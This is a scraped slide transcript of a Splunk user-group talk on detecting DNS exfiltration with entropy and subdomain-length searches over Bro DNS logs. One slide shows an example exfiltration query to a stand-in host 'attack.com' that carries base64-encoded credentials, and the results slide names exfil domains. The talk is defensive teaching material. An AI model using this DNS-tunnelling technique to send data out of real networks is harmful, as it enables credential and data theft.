Presentation is loading. Please wait.

Presentation is loading. Please wait.

Splunk User Group Mike Fasciano | Sr. Sales Engineer.

Published byCaren Hart Modified over 6 years ago

Similar presentations

Presentation on theme: "Splunk User Group Mike Fasciano | Sr. Sales Engineer."— Presentation transcript:

1 Splunk User Group Mike Fasciano | Sr. Sales Engineer

2 Agenda What is DNS Exfiltration? How can you detect it? Q&A

3 What is DNS Exfiltration?

4 answers.splunk.com What’s in a Domain Name and how does it work…
Servers or Service answers.splunk.com Host or Host+Sub-Domain Second Level Domain or just Domain Top Level Domain Your Laptop Destination DNS Server Your DNS Server Firewall

5 DNS exfiltration DNS Query:
ZG9tYWluPWNvcnA7dXNlcj1kYXZlO3Bhc3N3b3JkPTEyMzQ1DQoNCg==.attack.com domain=corp;user=dave;password=12345 encode Explain DNS Exfiltration – basically encoding they want to steal in DNS requests. Malicious code is downloaded, a user executes it, and it starts doing it’s dirty work. In this case, it starts encoding domain/user/password data. DNS Exfiltration tends to get lost in an ocean of DNS data, but we can fix that. How do we do this? Use some free tools, or write your own. In this case, we used free. I’ll break it down into two steps. Look for odd things, then see how they are behaving. ZG9tYWluPWNvcnA7dXNlcj1kYXZlO3Bhc3N3b3JkPTEyMzQ1DQoNCg==

6 List of provided commands ut_parse_simple(url)
DNS exfil detection – tricks of the trade parse URLs & complicated TLDs (Top Level Domain) calculate Shannon Entropy List of provided commands ut_parse_simple(url) ut_parse(url, list) or ut_parse_extended(url, list) ut_shannon(word) ut_countset(word, set) ut_suites(word, sets) ut_meaning(word) ut_bayesian(word) ut_levenshtein(word1, word2) DNS Exfiltration tends to get lost in an ocean of DNS data, but we can fix that.

7 Shannon Entropy Layman’s definition: a score reflecting the randomness or measure of uncertainty of a string. Examples The domain aaaaa.com has a Shannon Entropy score of 1.8 (very low) The domain google.com has a Shannon Entropy score of 2.6 (rather low) The domain A00wlkj—(-a.aslkn-C.a.2.sk.esasdfasf1111) uC.4.com has a Shannon Entropy score of 3 (rather high) DNS Exfiltration tends to get lost in an ocean of DNS data, but we can fix that.

8 Detecting Data Exfiltration
TIPS Leverage our Bro DNS data (or any DNS source) Calculate Shannon Entropy scores Calculate subdomain length Display Details index=bro sourcetype=bro_dns | eval list=“*” | `ut_parse(query, list)` | `ut_shannon(ut_subdomain)` | eval sublen = length(ut_subdomain) | table ut_domain ut_subdomain ut_shannon sublen DNS Exfiltration tends to get lost in an ocean of DNS data, but we can fix that.

9 DNS Exfiltration tends to get lost in an ocean of DNS data, but we can fix that.

10 Detecting Data Exfiltration
… | stats count avg(ut_shannon) as avg_sha avg(sublen) as avg_sublen stdev(sublen) as stdev_sublen by ut_domain | search avg_sha>3 avg_sublen>20 stdev_sublen<2 TIPS Leverage our Bro DNS data Calculate Shannon Entropy scores Calculate subdomain length Display count, scores, lengths, deviations DNS Exfiltration tends to get lost in an ocean of DNS data, but we can fix that.

11 Detecting Data Exfiltration
RESULTS Exfiltrating data requires many DNS requests – look for high counts DNS exfiltration to mooo.com and chickenkiller.com DNS exfil: 18k text file - Infected host is - Connected to [$base64_encoded_subdomain].xklsl29das.chickenkiller.com - Time frame is around AUG14 20mb+ Zip file - Connected to [$base64_encoded_subdomain].xklsl29das.mooo.com - Time frame is around AUG14

12 Thank You!

Download ppt "Splunk User Group Mike Fasciano | Sr. Sales Engineer."

Similar presentations

Table of Contents This document describes about XML application to control, customize, initiate action of phone. Overview of XML Application Each Function.

Table of Contents This document describes about XML application to control, customize, initiate action of phone. Overview of XML Application Each Function.
Video Streaming in Flash CSCI 4220 – Network Programming Kacper Harabasz.

Video Streaming in Flash CSCI 4220 – Network Programming Kacper Harabasz.
A field is a unit of information. Limit search by the title field.

A field is a unit of information. Limit search by the title field.
CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?

CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?
Simple Web SQLite Manager/Form/Report

Simple Web SQLite Manager/Form/Report
Tutorial SQL Server and Matlab CIS 526. Build a New Database in SQL server.

Tutorial SQL Server and Matlab CIS 526. Build a New Database in SQL server.
11 The Ghost In The Browser Analysis of Web-based Malware Reporter: 林佳宜 Advisor: Chun-Ying Huang 2010/3/29.

11 The Ghost In The Browser Analysis of Web-based Malware Reporter: 林佳宜 Advisor: Chun-Ying Huang /3/29.
Www.SecurityXploded.com. Disclaimer The Content, Demonstration, Source Code and Programs presented here is AS IS without any warranty or conditions.

Disclaimer The Content, Demonstration, Source Code and Programs presented here is "AS IS" without any warranty or conditions.
SeETL Demonstration 17 SeETL 3.1.02 Beta 01 15/07/2013 www.InstantBI.com.

SeETL Demonstration 17 SeETL Beta 01 15/07/2013
Web Application Access to Databases. Logistics Test 2: May 1 st (24 hours) Extra office hours: Friday 2:30 – 4:00 pm Tuesday May 5 th – you can review.

Web Application Access to Databases. Logistics Test 2: May 1 st (24 hours) Extra office hours: Friday 2:30 – 4:00 pm Tuesday May 5 th – you can review.
1 All Your iFRAMEs Point to Us Mike Burry. 2 Drive-by downloads Malicious code (typically Javascript) Downloaded without user interaction (automatic),

1 All Your iFRAMEs Point to Us Mike Burry. 2 Drive-by downloads Malicious code (typically Javascript) Downloaded without user interaction (automatic),
JavaScript, Fourth Edition

JavaScript, Fourth Edition
Internet. History ARPA Backbone IP Addresses –4 numbers separated by dots –Hard to remember –Exclusive club of users.

Internet. History ARPA Backbone IP Addresses –4 numbers separated by dots –Hard to remember –Exclusive club of users.
Codeigniter is an open source web application. It occupies a very small amount of space in the memory and is most useful for developers who aim to develop.

Codeigniter is an open source web application. It occupies a very small amount of space in the memory and is most useful for developers who aim to develop.
1 Working with MS SQL Server Textbook Chapter 14.

1 Working with MS SQL Server Textbook Chapter 14.
Chapter 8 Cookies And Security JavaScript, Third Edition.

Chapter 8 Cookies And Security JavaScript, Third Edition.
Web Authoring Rico Yu. Ch.6 Planning for a Web Site Introduction Steps in setting up Needs Planning.

Web Authoring Rico Yu. Ch.6 Planning for a Web Site Introduction Steps in setting up Needs Planning.
1 Oracle Architectural Components. 1-2 Objectives Listing the structures involved in connecting a user to an Oracle server Listing the stages in processing.

1 Oracle Architectural Components. 1-2 Objectives Listing the structures involved in connecting a user to an Oracle server Listing the stages in processing.
Aniket Joshi Justin Thomas. Agenda Introduction to SQL Injection SQL Injection Attack SQL Injection Prevention Summary.

Aniket Joshi Justin Thomas. Agenda Introduction to SQL Injection SQL Injection Attack SQL Injection Prevention Summary.
CRaSH Portal Team. 2 Agenda Introduction to CRaSH Deployment and connection Using the CRaSH command Develop the CRaSH commands yourself.

CRaSH Portal Team. 2 Agenda Introduction to CRaSH Deployment and connection Using the CRaSH command Develop the CRaSH commands yourself.

Similar presentations

Ads by Google